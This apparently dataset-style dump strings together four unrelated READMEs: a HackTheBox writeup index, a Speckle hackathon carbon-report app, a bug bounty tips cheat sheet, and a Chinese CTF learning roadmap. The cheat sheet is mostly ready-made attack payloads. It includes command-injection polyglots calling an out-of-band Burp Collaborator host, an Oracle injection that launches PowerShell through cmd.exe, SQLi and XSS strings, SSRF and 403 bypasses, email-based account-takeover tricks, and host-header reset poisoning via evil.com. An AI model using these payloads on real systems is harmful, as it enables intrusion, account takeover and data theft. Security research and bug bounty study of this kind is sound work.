text
stringlengths
9
334k
# HackTheBox Writeups * [Armageddon](Armageddon.md) * [Arctic](Arctic.md) * [Aragog](Aragog.md) * [Apocalyst](Apocalyst.md) * [Access](Access.md)
<h1 align="center"> <img src="https://user-images.githubusercontent.com/2679513/131189167-18ea5fe1-c578-47f6-9785-3748178e4312.png" width="150px"/><br/> Speckle | Oct'21 Hackathon </h1> <h3 align="center"> Report Generator — A carbon cost estimator tool </h3> <p align="center"><b>Speckle</b> is data infrastructure for the AEC industry.</p><br/> <p align="center"><a href="https://twitter.com/SpeckleSystems"><img src="https://img.shields.io/twitter/follow/SpeckleSystems?style=social" alt="Twitter Follow"></a> <a href="https://speckle.community"><img src="https://img.shields.io/discourse/users?server=https%3A%2F%2Fspeckle.community&amp;style=flat-square&amp;logo=discourse&amp;logoColor=white" alt="Community forum users"></a> <a href="https://speckle.systems"><img src="https://img.shields.io/badge/https://-speckle.systems-royalblue?style=flat-square" alt="website"></a> <a href="https://speckle.guide/dev/"><img src="https://img.shields.io/badge/docs-speckle.guide-orange?style=flat-square&amp;logo=read-the-docs&amp;logoColor=white" alt="docs"></a></p> # About Speckle What is Speckle? Check our ![YouTube Video Views](https://img.shields.io/youtube/views/B9humiSpHzM?label=Speckle%20in%201%20minute%20video&style=social) ### Features - **Object-based:** say goodbye to files! Speckle is the first object based platform for the AEC industry - **Version control:** Speckle is the Git & Hub for geometry and BIM data - **Collaboration:** share your designs collaborate with others - **3D Viewer:** see your CAD and BIM models online, share and embed them anywhere - **Interoperability:** get your CAD and BIM models into other software without exporting or importing - **Real time:** get real time updates and notifications and changes - **GraphQL API:** get what you need anywhere you want it - **Webhooks:** the base for a automation and next-gen pipelines - **Built for developers:** we are building Speckle with developers in mind and got tools for every stack - **Built for the AEC industry:** Speckle connectors are plugins for the most common software used in the industry such as Revit, Rhino, Grasshopper, AutoCAD, Civil 3D, Excel, Unreal Engine, Unity, QGIS, Blender and more! ### Try Speckle now! Give Speckle a try in no time by: - [![speckle XYZ](https://img.shields.io/badge/https://-speckle.xyz-0069ff?style=flat-square&logo=hackthebox&logoColor=white)](https://speckle.xyz) ⇒ creating an account at - [![create a droplet](https://img.shields.io/badge/Create%20a%20Droplet-0069ff?style=flat-square&logo=digitalocean&logoColor=white)](https://marketplace.digitalocean.com/apps/speckle-server?refcode=947a2b5d7dc1) ⇒ deploying an instance in 1 click ### Resources - [![Community forum users](https://img.shields.io/badge/community-forum-green?style=for-the-badge&logo=discourse&logoColor=white)](https://speckle.community) for help, feature requests or just to hang with other speckle enthusiasts, check out our community forum! - [![website](https://img.shields.io/badge/tutorials-speckle.systems-royalblue?style=for-the-badge&logo=youtube)](https://speckle.systems) our tutorials portal is full of resources to get you started using Speckle - [![docs](https://img.shields.io/badge/docs-speckle.guide-orange?style=for-the-badge&logo=read-the-docs&logoColor=white)](https://speckle.guide/dev/) reference on almost any end-user and developer functionality ![Untitled](https://user-images.githubusercontent.com/2679513/132021739-15140299-624d-4410-98dc-b6ae6d9027ab.png) # Repo structure This repo contains the code for the a **carbon cost report generator** developed on a 1-day hackathon during our company retreat on October 2021. [**We wrote a blog post about it!**]() > Go see the app live [here](https://stupefied-yonath-58869c.netlify.app/) It is divided into 2 folders: - `frontend/`: A `vue.js` application allowing to setup carbon report generation for any stream, and view the resulting report. - `server/`: A `FastAPI` Python server that receives notifications of each new commit in a stream, and generates a carbon report based on the data. ## Frontend First, install all necesary dependencies by running `npm install` on the `frontend/` folder. Inside the `frontend/` folder, you'll find a file named `.env.local-example`. Rename it to `.env.local` and fill in the variables accordingly. > The app ID and app secret are obtained when creating a new app in your [Speckle profile section](https://speckle.xyz/profile). Then run `npm run serve` to run the app in development mode. To build the app run `npm run build` ## Server To run the app, use the provided `Dockerfile` To run the app, create a `.env` file based on the `.env_example`, and pass that to docker run via the `--env-file` flag For debug see the `.vscode/launch.json` for a sample config. Use the example hooks provided, and the `http://localhost:8000/docs` page to test things.
# BugBounty Tips Collection of `#bugbountytips` from twitter and my bash-jutsu. # Recon ``` Google the company copyright footer to get more domains. Use whoxy.com to perform reverse whois lookups with the email used to register the main domain/ Search for slide,docs,demos and video tutorials by your target. Manny innocent examples could leak juicy endpoints. Use OpenSSL to get certificates. They can contain valuable info and common names form finding more subdomains. Try to recreate data from deleted accounts by siging up with the old email address. Check text version of HTML e-mail for template injections When testing Rails Application add .json to url endpoints. cat file | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*"* curl http://host.xx/file.js | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*"* grep -EHirn "accesskey|admin|aes|api_key|apikey|checkClientTrusted|crypt|http:|https:|password|pinning|secret|SHA256|SharedPreferences|superuser|token|X509TrustManager|insert into|DB_USER|DB_PASSWORD" folder/ ``` # Subdomain Enumeration ``` sublist3r -d $1 -o $1.txt mkdir thirdlevel echo "Gathering full third-level domain with sublister" for domain in $(cat $1.txt); do sublist3r -d $domain -o thirdlevel/$domain.txt; cat thirdlevel/$domain.txt | sort -u >> final.txt; done echo "Probing for alive third-levels..." cat final.txt | httprobe > probed.txt ``` # subdomain level extraction |Regex pattern |Domain level match| | ------ | ------ | |grep -P '^(?:[a-z0-9]+\.){1}[^.]*$' |2nd level domains only| |grep -P '^(?:[a-z0-9]+\.){2}[^.]*$' |3rd level domains only| |grep -P '^(?:[a-z0-9]+\.){2,}[^.]*$' |3rd level domains or higher| |grep -P '^(?:[a-z0-9]+\.){2,3}[^.]*$' |3rd to 4th level domains only| |grep -P '^(?:[a-z0-9]+\.){3,}[^.]*$' |4th level domains or higher| # Check live ``` cat GREPABLENMAP.gnmap | grep 443/open | cut -d "(" -f 1 | cut -d : -f 2| tr -d " " | sed -E 's#https?://##I' | sed -E 's#/.*##' | sed -E 's#^\*\.?##' | sed -E 's#,#\n#g' | tr '[:upper:]' '[:lower:]' | uniq | sed -e 's/^/https:\/\//' | httpx -silent -timeout 2 -threads 100 -status-code -mc 200,302 |anew ``` # Check live webapps from sublis3r ``` cat subdomains.txt | sed -E 's#https?://##I' | sed -E 's#/.*##' | sed -E 's#^\*\.?##' | sed -E 's#,#\n#g' | tr '[:upper:]' '[:lower:]' | uniq | sed -e 's/^/https:\/\//' | httpx -silent -timeout 2 -threads 100 -status-code -mc 200,302 |anew ``` # Filter ffuf output ``` cat * | jq | grep "url\"" | grep -v "replayproxyurl" |grep -v "proxyurl" | grep -v "FUZZ" | cut -d \" -f4 ``` # Tools ``` Use exiftool to extract metadata from documents, it might reveal vulnerable htmltopdf generators Use cloud_enum to find open google buckets or azure accounts Use Grep to extract endpoints with grep: grep -o -E '(https?://)?/?[{}a-z0-9A-Z_\.-]{2,}/[{}/a-z0-9A-Z_\.-]+' Use WayBackmachine combined with paraminer or parameth Passive parameter mining web.archive.org /cdx/search/cdx?url=*.target.com/*&output=text&fl=original&collapse=urlkey ``` # Payloads ``` Inject payloads in parameter names, ?<script>alerty</script>=true Use youtube(olx, etc...) videos with xss in names. Use round brackets to inject payload into valid e-mail address. X-Forwarded-For: ${payload} Use longstring parameters for stacktrace. WAFBYPASS ?page=";confirm`1`// Rightwards -> 302; ?pag%65=";confirm`1`// Rightwards -> 200 + XSS! Redirect bypass %26next=http://example.com When testing nodejs site add %ff at the end of url https://target.com/%ff, most of times cause error and return stacktrace with full path Add [] to name of parrameter: pwd= ->pwd[]= when interacting with db try to put % in parameter ?item=% ``` # Authentication & Autorization ``` UUID Idor Trick, Register user with the same name, it maybe return uuid. Try to bruteforce login endpoint. /login/${oauth_provider}, login/facebook, login/oauth/twitter login/oauth/v2/yahoo 403 Forbidden bypass, https://host.com/path =403, https://host.com/%2e/path = 200, Bypass paywalls by using Google Bot user agent. User securitytrails.com to find the originating server IP Do match and replace form false to true. Set your birthday for today ot tomorrow to get discounts. Skip steps: /step/shipping -> ~~/step/payment~~ -> /step/confirm Check does blackfriday coupon codes expires. Use blind xss as password. Login to site using Facebook and try tochange userid during POST requests /api/v1/users/profile?id=MYID&id=ANOTHERUSERID -> HTTP 200 ``` # Email Restriction bypass ``` inti(;[email protected];)@whitelisted.com → inti(; → [email protected] → my inbox! → ;)@whitelisted.com ● [email protected](@whitelisted.com) ● inti+(@whitelisted.com;)@inti.io ``` # Email Address input fuzz ``` test+(<script>alert(1)</script>)@example.com test@example(<script>alert(1)</script>).com "<script>alert(1)</script>"@example.com "<%=7*7%>"@example.com test+(${{7*7}})@example.com "'OR 1=1--"@example.com "mail');DROP TABLE users;--"@example.com [email protected] test@[127.0.0.1] victim&[email protected] "%0d%0aContent-Lenght:%200@0d%0a%0d%0a"@example.com"[email protected]>\r\nRCPT TO:<victim+"@test.com ``` # Account takeover via Email ``` GET /passwordreset Double parameter (aka. HPP / HTTP parameter pollution): [email protected]&[email protected] Carbon copy: [email protected]%0a%0dcc:[email protected] Using separators: [email protected],[email protected] [email protected]%[email protected] [email protected]|[email protected] No domain: email=victim No TLD (Top Level Domain): email=victim@xyz JSON table: {"email":["[email protected]","[email protected]"]} ``` # Password Reset: ``` reset userpassword: [email protected] ``` # Find GET parameters in example.com ``` assetfinder example.com | gau | egrep -v '(.css|.png|.jpeg|.jpg|.svg|.gif|.wolf)' | while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Z0-9]+" | sed -e 's,'var','"$url"?',g' -e 's/ //g' | grep -v '.js' | sed 's/.*/&=xss/g'); echo -e "\e[1;33m$url\n\e[1;32m$vars"; done ``` # Command injection polyglot ``` /*$(ping -c 2 example.com)`ping -c 2 example.com``*/-ping -c 2 example.com-'/*$(ping -c 2 example.com)`ping -c 2 example.com` #*/-ping -c 2 example.com||'"||ping -c 2 example.com||"/*`*/ /*$(echo 1 >/tmp/rce1)`echo 1 >/tmp/rce1``*/-echo 1 >/tmp/rce1-'/*$(echo 1 >/tmp/rce1)`echo 1 >/tmp/rce1` #*/-echo 1 >/tmp/rce1||'"||echo 1 >/tmp/rce1||"/*`*/ |echo lol2137||a #' |echo lol2137||a #|" |echo lol2137||a # ||`ping -c 21 127.0.0.1` #' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\" |ping -n 21 127.0.0.1 ||`ping -c 21 grb0fhwh3gg8b9g0nbeqddobp2vsjh.burpcollaborator.net` #' |ping -n 21 grb0fhwh3gg8b9g0nbeqddobp2vsjh.burpcollaborator.net||`ping -c 21 grb0fhwh3gg8b9g0nbeqddobp2vsjh.burpcollaborator.net` #\" |ping -n 21 grb0fhwh3gg8b9g0nbeqddobp2vsjh.burpcollaborator.net ||`dig grb0fhwh3gg8b9g0nbeqddobp2vsjh.burpcollaborator.net` #' |dig grb0fhwh3gg8b9g0nbeqddobp2vsjh.burpcollaborator.net||`dig grb0fhwh3gg8b9g0nbeqddobp2vsjh.burpcollaborator.net` #\" |dig grb0fhwh3gg8b9g0nbeqddobp2vsjh.burpcollaborator.net $(sleep 21) ``` # SSRF Bypass list for localhost (127.0.0.1): ``` http://127.1/ http://0000::1:80/ http://[::]:80/ http://2130706433/ http://[email protected] http://0x7f000001/ http://017700000001 http://0177.00.00.01 ``` # Top 25 SSRF parameters ``` ?dest={target} ?redirect={target} ?uri={target} ?path={target} ?continue={target} ?url={target} ?window={target} ?next={target} ?data={target} ?reference={target} ?site={target} ?html={target} ?val={target} ?validate={target} ?domain={target} ?callback={target} ?return={target} ?page={target} ?feed={target} ?host={target} ?port={target} ?to={target} ?out={target} ?view={target} ?dir={target} ``` # Top 25 RCE parameters ``` ?cmd={payload} ?exec={payload} ?command={payload} ?execute{payload} ?ping={payload} ?query={payload} ?jump={payload} ?code={payload} ?reg={payload} ?do={payload} ?func={payload} ?arg={payload} ?option={payload} ?load={payload} ?process={payload} ?step={payload} ?read={payload} ?function={payload} ?req={payload} ?feature={payload} ?exe={payload} ?module={payload} ?payload={payload} ?run={payload} ?print={payload} ``` # Top 25 LFI parameters ``` ?cat={payload} ?dir={payload} ?action={payload} ?board={payload} ?date={payload} ?detail={payload} ?file={payload} ?download={payload} ?path={payload} ?folder={payload} ?prefix={payload} ?include={payload} ?page={payload} ?inc={payload} ?locate={payload} ?show={payload} ?doc={payload} ?site={payload} ?type={payload} ?view={payload} ?content={payload} ?document={payload} ?layout={payload} ?mod={payload} ?conf={payload} ``` # HackerOne redirect parameters ``` /[redirect] ?targetOrigin=[redirect] ?fallback=[redirect] ?query=[redirect] ?redirection_url=[redirect] ?next=[redirect] ?ref_url=[redirect] ?state=[redirect] ?l=[redirect] ?redirect_uri=[redirect] ?forum_reg=[redirect] ?return_to=[redirect] ?redirect_url=[redirect] ?return_url=[redirect] ?host=[redirect] ?url=[redirect] ?redirectto=[redirect] ?return=[redirect] ?prejoin_data=[redirect] ?callback_url=[redirect] ?path=[redirect] ?authorize_callback=[redirect] ?email=[redirect] ?origin=[redirect] ?continue=[redirect] ?domain_name=[redirect] ?redir=[redirect] ?wp_http_referer=[redirect] ?endpoint=[redirect] ?shop=[redirect] ?qpt_question_url=[redirect] ?checkout_url=[redirect] ?ref_url=[redirect] ?redirect_to=[redirect] ?succUrl=[redirect] ?file=[redirect] ?link=[redirect] ?referrer=[redirect] ?recipient=[redirect] ?redirect=[redirect] ?u=[redirect] ?hostname=[redirect] ?returnTo=[redirect] ?return_path=[redirect] ?image=[redirect] ?requestTokenAndRedirect=[redirect] ?retURL=[redirect] ?next_url=[redirect] ``` # MORE PARAMETERS https://github.com/1ndianl33t/Gf-Patterns # Massive XSS ``` #!/bin/bash # $1 => example.domain subfinder -d $1 -o domains_subfinder_$1 amass enum --passive -d $1 -o domains_$1 cat domains_subfinder_$1 | tee -a domains_$1 cat domains_$1 | filter-resolved | tee -a domains_$1.txt cat domains_$1.txt | ~/go/bin/httprobe -p http:81 -p http:8080 -p https:8443 | waybackurls | kxss | tee xss.txt ``` # Masive Top Parameters search ``` TBA echo "http://tesla.com" | waybackurls | httpx -silent -timeout 2 -threads 100 | gf redirect | anew ``` # Juicy GoogleDorks ``` site:example.com inurl:.cgi? ``` # File Upload and what to search ``` ASP / ASPX / PHP5 / PHP / PHP3: Webshell / RCE SVG: Stored XSS / SSRF / XXE GIF: Stored XSS / SSRF CSV: CSV injection XML: XXE AVI: LFI / SSRF HTML / JS : HTML injection / XSS / Open redirect PNG / JPEG: Pixel flood attack (DoS) ZIP: RCE via LFI / DoS PDF / PPTX: SSRF / BLIND XXE ``` # File upload chain ``` ../../../tmp/lol.png —> for path traversal sleep(10)-- -.jpg —> for SQL injection <svg onload=alert(document.domain)>.jpg/png —> for XSS ; sleep 10; —> for command injections ``` # Find JavaScript Files in Target.com ``` echo target.com | gau | grep '\.js$' | httpx -status-code -mc 200 -content-type | grep 'application/javascript' or cat domains | httpx -silent | subjs | anew ``` # Extract endpoints from \*.js ``` cat file.js | grep -aoP "(?<=(\"|\'|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\`))" | sort -u ``` # Extract juicy data from js ``` cat hosts | httpx -silent | subjs | anew | httpx -silent -sr -mc 200 grep -EHirn "accesskey|admn|aes|api_key|apikey|password|secret|token" ./output --color ``` # 403 bypass ``` https://target.com/admin/ –> HTTP 302 (redirect to login page) https://target.com/admin..;/ –> HTTP 200 OK https://target.com/../admin https://target.com/whatever/..;/admin site.com/secret –> HTTP 403 Forbidden site.com/secret/ –> HTTP 200 OK site.com/secret/. –> HTTP 200 OK site.com//secret// –> HTTP 200 OK site.com/./secret/.. –> HTTP 200 OK X-Original-URL: /admin X-Override-URL: /admin X-Rewrite-URL: /admin /accessible/..;/admin /.;/admin /admin;/ /admin/~ /./admin/./ /admin?param /%2e/admin /admin# ``` # Data leakage through .json ``` Here’s a tip to achieve sensitive data leak using .json extension. Request: GET /ResetPassword HTTP/1.1 {"email":"[email protected]"} Response: HTTP/1.1 200 OK Now let’s try this instead: Request: GET /ResetPassword.json HTTP/1.1 {"email":"[email protected]"} Response: HTTP/1.1 200 OK {"success":"true","token":"596a96-cc7bf-9108c-d896f-33c44a-edc8a"} ``` # Generate wordlist for target ``` echo "bugcrowd.com" | subfinder -silent | hakrawler -plain -usewayback -scope yolo | sed $'s/[./?=:&#]/\\n/g' | anew ``` # Check for SQLi ``` /?q=1 /?q=1' /?q=1" /?q=[1] /?q[]=1 /?q=1` /?q=1\ /?q=1/*'*/ /?q=1/*!1111'*/ /?q=1'||'asd'||' <== concat string /?q=1' or '1'='1 /?q=1 or 1=1 /?q='or''=' ``` # SQLi in Email parameter | Payload | Response |Injection Status | | ------ | ------ |------ | |{“email”:”[email protected]”}| {“code”:2002,”status”:200,”message”:”Email not found.”}| Valid| |{“email”:”asd [email protected]”}| {“code”:2002,”status”:200,”message”:”Bad format”}| Not Valid| |{“email”:”\”asd a\”@a.com”}| {“code”:2002,”status”:200,”message”:”Bad format”}| Not Valid| |{“email”:”asd(a)@a.com”}| {“code”:2002,”status”:200,”message”:”Bad format”}| Not Valid| |{“email”:”\”asd(a)\”@a.com”}| {“code”:2002,”status”:200,”message”:”Email not found.”}| Valid| |{“email”:”asd’[email protected]”}| {“code”:0,”status”:500,”message”:”Unspecified error”}| Not Valid| |{“email”:”asd’or’1’=’[email protected]”}| {“code”:2002,”status”:200,”message”:”Email not found.”} Valid| |{“email”:”a’-IF(LENGTH(database())>9,SLEEP(7),0)or’1’=’[email protected]”}| {“code”:2002,”status”:200,”message”:”Bad format”}| Not Valid| |{“email”:”\”a’-IF(LENGTH(database())>9,SLEEP(7),0)or’1’=’1\”@a.com”}| {“code”:0,”status”:200,”message”:”Successful”}| Valid Delay: 7,854 milis| |{“email”:”\”a’-IF(LENGTH(database())=10,SLEEP(7),0)or’1’=’1\”@a.com”}| {“code”:0,”status”:200,”message”:”Successful”}| Valid Delay: 8,696 milis| |{“email”:”\”a’-IF(LENGTH(database())=11,SLEEP(7),0)or’1’=’1\”@a.com”}| {“code”:0,”status”:200,”message”:”Successful”}| Valid No delay| ### Oracle ``` 1) UNION SELECT CASE WHEN (SELECT ASCII(SUBSTR((SELECT user FROM dual), 1, 1 )) FROM dual) >71 THEN (dbms_pipe.receive_message(('a'),10)) ELSE NULL END FROM dual -- 1' AND 1=2 UNION SELECT SYS.KUPP$PROC.CREATE_MASTER_PROCESS('DBMS_SCHEDULER.create_program(''exec4'',''EXECUTABLE'',''c:\\WINDOWS\\system32\\cmd.exe /c type C:\\users\\public\\shell.ps1 | PowerShell.exe -noprofile - '',0,TRUE);DBMS_SCHEDULER.create_job(job_name=>''myjob11'',program_name=>''exec4'',start_date=>NULL,repeat_interval=>NULL,end_date=>NULL,enabled=>TRUE,auto_drop=>TRUE);dbms_lock.sleep(1);dbms_scheduler.drop_program(program_name=>''exec4'');dbms_scheduler.purge_log;'), null FROM DUAL -- 1' AND 1=1 UNION SELECT null, user FROM DUAL -- ``` ### Cool BurpPlugins ``` Autorize – To test BACs (Broken Access Control) Burp Bounty – Profile-based scanner Active Scan++ – Add more power to Burp’s Active Scanner AuthMatrix – Authorization/PrivEsc checks Broken Link Hijacking – For BLH (Broken Link Hijacking) Collaborator Everywhere – Pingback/SSRF (Server-Side Request Forgery) Command Injection Attacker Content-Type Converter – Trying to bypass certain restrictions by changing Content-Type Decoder Improved – More decoder features Freddy – Deserialization Flow – Better HTTP history Hackvertor – Handy type conversion HTTP Request Smuggler Hunt – Potential vuln identifier InQL – GraphQL Introspection testing J2EE Scan – Scanning J2EE apps JSON/JS Beautifier JSON Web Token Attacker ParamMiner – Mine hidden parameters Reflected File Download Checker Reflected Parameter – Potential reflection SAML Raider – SAML testing Upload Scanner – File upload tester Web Cache Deception Scanner ``` # Detect framework via favico ``` cat urls.txt | python3 favfreak.py -o output ``` ### Password Poisoning ``` (1) Normal request: Request: POST /password-reset?user=123 HTTP/1.1 Host: target.com Link received: https://target.com/reset-link=1g2f3guy23g (2) Basic HHI (Host Header Injection): Request: POST /password-reset?user=123 HTTP/1.1 Host: evil.com Link received: none Error 404 - request blocked (3) Bypass technique: Request: POST https://target.com/password-reset?user=123 HTTP/1.1 Host: evil.com Link received: https://evil.com/reset-link=1g2f3guy23g ``` ### Find hostsname form given IP ``` echo 192.168.69.69 | cero ``` ### XSS Post Message POC ``` Vulnerable PostMessage <script src="//ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script> <script> window.addEventListener("message", (event) => { console.log(event.data); $(event.data) }, false); </script> Exploit <!DOCTYPE html> <html> <head> </head> <body> <script> var myWindow = window.open("http://example.com/test.html") </script> <script> setInterval(function(){myWindow.postMessage("<img src=x onerror=alert(123);>","*");},3000); window.onmessage = function (e) { console.log(e); }; </script> </body> </html> ``` ### Deserialization ``` https://nickbloor.co.uk/2017/08/13/attacking-java-deserialization/ https://github.com/tyranid/ExploitRemotingService https://github.com/nccgroup/VulnerableDotNetHTTPRemoting https://github.com/pwntester/ysoserial.net/blob/master/README.md https://nickbloor.co.uk/2018/02/28/popping-wordpress/ ``` ### From Path Traversal to Source Code in Asp.NET MVC Applications ``` https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/ http://bit.ly/2NDZc73 ``` ### Hacking IIS ``` https://www.youtube.com/watch?v=HrJW6Y9kHC4 ``` ### Geting endpoints from web-archive ``` cat hosts.live | gau -b ttf,woff,svg,png,jpg,gif,css,jpeg,pdf,zip,gz | tee -a hosts.gau ``` ### CLI Hacking Cheatsheet Getting JS from live hosts ``` cat hosts.httprobe | getJS --complete | tee -a hosts.httprobe.js cat hosts.httprobe | gau | tee -a hosts.httprobe.gau cat hosts.httprobe.gau |grep -iE '\.js'|grep -ivE '\.json'|sort -u >> hosts.httprobe.js # cat hosts.httprobe.gau | unfurl format %s://%d%p |grep -iE '\.js'|grep -ivE '\.json'|sort -u cat hosts.httprobe.js | sort -u >> hosts.httprobe.js.sorted cat hosts.httprobe.js.sorted|cut -d \? -f1 | sort -u | httpx -mc 200 | tee -a hosts.httprobe.js.sorted.200 cat hosts.httprobe.js.sorted.200 | httpx -silent -sr -mc 200 ``` Searching for RXSS ``` cat hosts.httprobe | gau | tee -a hosts.httprobe.gau cat hosts.httprobe.gau | unfurl format %s://%d%p | sort -u | tee -a hosts.httprobe.gau.unfurl cat hosts.httprobe.gau.unfurl | httpx -mc 200 | tee -a hosts.httprobe.gau.unfurl.200 cat hosts.httprobe.gau.unfurl.200 | dalfox pipe -o hosts.httprobe | tee -a hosts.httprobe.gau.unfurl.200.dalfox ``` Geting endpoints with potential hackable parameters ``` cat hosts.httprobe | cut -d / -f 3 |gau -b css,png,jpeg,jpg,svg,gif,wolf,pdf,txt,ptt,gz,zip,csv | tee -a hosts.httprobe.gau cat hosts.httprobe.gau | grep -E 'asp|aspx|cgi|jsp|php|sql'| unfurl format %s://%d%p | sort -u | tee -a hosts.httprobe.gau.unfurl.ext for i in `cat hosts.httprobe.gau.unfurl.ext`; do grep $i hosts.httprobe.gau | grep \? | head -n1 | tee -a hosts.httprobe.gau.unfurl.ext.filtred ; done cat hosts.httprobe.gau.unfurl.cgi.filtred | httpx -mc 200 | tee -a hosts.httprobe.gau.unfurl.cgi.filtred.200 ``` Bruteforcing juicy endpoints ``` for i in `cat hosts.httprobe.filtred `; do ffuf -w /payloads/free-kill.txt -u $i/FUZZ -of json -o qh-output/`echo $i | cut -d / -f3` -mc 200 -fl 1 -ac ; done for i in `ls qh-output/`; do cat qh-output/$i | python -m json.tool | grep "url\"" | grep -v "replayproxyurl" |grep -v "proxyurl" | grep -v "FUZZ" | cut -d \" -f4 >> qh-urls.txt;done ``` ### Random ``` https://regex-generator.olafneumann.org/ https://regex101.com/ ``` ### Reference https://gowsundar.gitbook.io/book-of-bugbounty-tips/ https://soroush.secproject.com/blog/
# The_Growth_Path_Of_A_CTFer/Pwner(一名CTF爱好者、安全从业者的成长之路❌ 一名安全菜鸟的成长之路✅) 作者:中科院某所网络安全方向研究生在读,(菜狗狗🐶),对网络安全,CTF非常感兴趣.学习的领域包括但不限于二进制、系统安全、红队攻防等. 这个仓库会记录自己的成长历程以及精心整理,学习收集的资料. 欢迎pr! !这些资料自己基本上都看过或者正在学习~ 会给出对资料的自己的理解,所以相对有较好的参考价值!(应该吧..) 此外,还包含了一些网安的活动日历,ctf日历等(目前没时间管这个了..大家可以多关注ctftime和一些安全社区等,会有通知).可以参考! Table of Contents 目录 ================= * [近期更新](#近期更新) * [🎯个人现阶段学习规划及目标 + 感想](#个人现阶段学习规划及目标--感想) * [近期网安活动、CTF竞赛日程](#近期网安活动ctf竞赛日程) * [网安活动](#网安活动) * [🗓🚩CTF日程](#ctf日程) * [目标](#目标) * [2022年完成pwn入门呀!](#2022年完成pwn入门呀) * [💫综述类:心路历程、职业规划:](#综述类心路历程职业规划) * [常规学习资源](#常规学习资源) * [国内外高校优质课程:](#国内外高校优质课程) * [📖书籍:](#书籍) * [计算机基础:](#计算机基础) * [操作系统](#操作系统) * [逆向](#逆向) * [python](#python) * [计算机网络](#计算机网络) * [🌐学习网站](#学习网站) * [非常规学习资源](#非常规学习资源) * [学术界大佬 | 团队(排名不分先后):](#学术界大佬--团队排名不分先后) * [国内](#国内) * [国外](#国外) * [安全社区](#安全社区) * [二进制、逆向](#二进制逆向) * [web安全、渗透测试](#web安全渗透测试) * [其他](#其他) * [安全团队网站](#安全团队网站) * [个人博客](#个人博客) * [微信公众号](#微信公众号) * [知识星球](#知识星球) * [github项目](#github项目) * [一些工具:](#一些工具) * [修身养性](#修身养性) * [其余资源获取途径](#其余资源获取途径) * [🚩CTF专栏](#ctf专栏) * [书籍](#书籍-1) * [CTF战队资源](#ctf战队资源) * [CTF学习、练习网站](#ctf学习练习网站) * [ctf导航](#ctf导航) * [参考链接:](#参考链接) <!-- Created by https://github.com/ekalinin/github-markdown-toc --> # 🎯近期记录、感想+个人目标 ## 近期记录+ 感想 9.29 更新 最近比较忙...选的基本课感觉还是比较硬核的,主要是想学好的话需要拓展很多,比如计算机体系结构,os,需要看很多本参考书,和恶补基础. ​ 最近在准备乙组升甲组的升级赛(感觉这一次有点悬...不过体验体验也会好的...),最近在疯狂学pwn,栈算是入了个门,堆也狂补了一段时间,现在就是个半瓶水... ​ 最低希望三个月后能较为轻松的进入甲队. ​ 最晚国庆后搭建好新的博客,然后至少每周一篇博客的更新频率吧 ​ ​ 然后因为博客自己希望发高质量一点的...所以可以要有不少的积累,但是自己又想每天发点东西,于是现在在pwn入门目录下开了每日的学习记录,一些方便公开和自己觉得可以的当天学习到的东西会放在里面~ 个人博客: tangzichengcc.github.io 每日可看: 玄武实验室每日推送 ## 目标 ### 2022年完成pwn入门呀! ✅5月份:完成栈相关知识和漏洞的初步入门,了解寄存器,栈的结构,内存布局,架构相关,调用约定等,栈相关漏洞,ida和gdb的初步使用. 攻防世界等平台的栈相关的简单题 6月份:进行栈的进阶和字符串漏洞,整数漏洞等的学习 7-9月份:开始学习堆相关知识. 主要看的大佬博客: (感谢各位大佬的贡献!!!!!!!!!!!!!!!!!!!!!!) https://xuanxuanblingbling.github.io https://blingblingxuanxuan.github.io https://bestwing.me/archives/page/14/ https://etenal.me/archives/1121 待看 http://blog.imv1.me https://eqqie.cn [https://trailofbits.github.io/ctf/](https://trailofbits.github.io/ctf/) [https://security.ntu.st/](https://link.zhihu.com/?target=https%3A//security.ntu.st/) https://github.com/BrieflyX/ctf-pwns Atum 主要刷题: pwnable.kr # 近期网安活动、CTF竞赛日程 ## 网安活动 * ## 🗓🚩CTF日程 * # 💫综述类:心路历程、职业规划: 你为什么选择安全这条路?不同人有不同的看法. 你能坚持下去吗? 有很多大佬给过一些综合性的建议,可以在迷茫或者遇到瓶颈的时候,多看看. 1.So you want to work in security? (and for some reason ended up here rather than reading other people’s posts on the topic). 2.谷歌的Google Project Zero[http://ifsec.blogspot.jp/2018/02/so-you-want-to-work-in-security-and-for.html](http://ifsec.blogspot.jp/2018/02/so-you-want-to-work-in-security-and-for.html) 3.TK教主的微博/知乎 关于网安的问答 4.安全大佬 http://greads.net/post/2366186.html # 常规学习资源 ## 国内外高校优质课程: 哈佛cs50(计算机基础课程):[https://cs50.harvard.edu/college/2022/spring/notes/0/](https://cs50.harvard.edu/college/2022/spring/notes/0/) 由浅入深,循序渐进 MIT 操作系统神级课程 6.828:[https://github.com/prakhar1989/awesome-courses](https://github.com/prakhar1989/awesome-courses) 南大操作系统:[http://jyywiki.cn](http://jyywiki.cn/) [https://space.bilibili.com/202224425](https://space.bilibili.com/202224425)老师讲的比较生动有趣,并且有特别多的动手操作的实践环节,老师也是用终端进行演示,边演示边讲解理论. ## 📖书籍: ### 计算机基础: 《计算机体系结构基础》 胡伟武 大牛大牛!对理解计算机底层非常有帮助,讲的深入浅出. 《计算机体系结构 》胡伟武 相比基础肯定会难一点,这是研究生的教材 《CTF权威指南 PWN》 《CSAPP》 计算机经典神书!只是比较厚,可以先略读一遍,或者挑自己需要的地方看. 《程序员的自我修养 链接 装载与库》 详细全面地讲解了程序的生成,以及在底层的机制.对于想学习逆向,PWN或者底层知识的同学来说是本很好的书 《操作系统真象还原》 内核 ### 操作系统 《Linux内核设计的艺术》新设计团队 杨老师太牛了!对着Linux0.11 内核源码讲课,非常好的书! 《IA32》第三卷, 这是英特尔给工程师的官方手册,有翻译版本,质量不用说,推荐配合《linux内核设计的艺术》啃完! * https://pages.cs.wisc.edu/~remzi/OSTEP/ 对应的练习项目https://github.com/remzi-arpacidusseau/ostep-projects * http://www.oldlinux.org ### 网络安全 《网络信息安全的真相》20年前的老书了,但是一点也不过时,感觉国内的安全产品的思想甚至还没完全做到书里的,老师强推的经典,确实很不错! 《计算机安全导论 深度实践》 